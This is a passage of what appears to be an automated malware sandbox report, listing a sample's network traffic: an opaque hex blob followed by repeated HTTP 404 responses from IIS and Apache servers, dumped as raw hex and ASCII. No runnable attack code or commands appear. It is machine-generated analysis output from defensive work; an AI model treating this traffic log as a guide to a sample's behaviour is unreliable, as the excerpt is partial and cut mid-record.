5c 35 ee ae fc c8 09 9b 71 53 9c e9 72 67 52 17 8d bb 24 ba e5 67 c9 e8 2e de ac 69 8e fe 2c e2 24 1e 8a 66 12 2c f1 c9 5f ae 87 f5 95 b8 76 fe 00 c0 8d d6 95 bf d8 88 1f 66 f5 c6 fd 59 2c e2 18 e0 df 24 61 04 d1 6e 61 fe 7f 87 0e d7 c3 e6 ff 7f f3 c3 9f 5a 71 12 61 e0 82 d9 6d 3d 69 34 ee c1 8b c9 9c d0 dd df a7 e8 d7 75 e0 20 d2 44 6b 82 ae 46 3f 89 49 52 ef 34 3b 4d 7c f7 57 57 3e 86 96 54 44 f6 75 2e 48 ff 34 50 80 5e 2f 7e c6 50 d6 13 54 ef 34 ce a8 73 c9 88 a8 fc 25 58 25 bd ee 57 51 e4 df d6 45 eb 12 34 d1 bc 03 ed fe 3e a0 5b a4 0f 1b cd 68 84 b6 0f Data Ascii: 3041}}w6
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:30 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:33 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:35 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Mon, 01 Jul 2024 17:25:39 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:56 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 01 Jul 2024 17:25:58 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlServer: Microsoft-IIS/10.0X-Powered-By: ASP.NETDate: Mon, 01 Jul 2024 17:26:12 GMTConnection: closeContent-Length: 1245Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 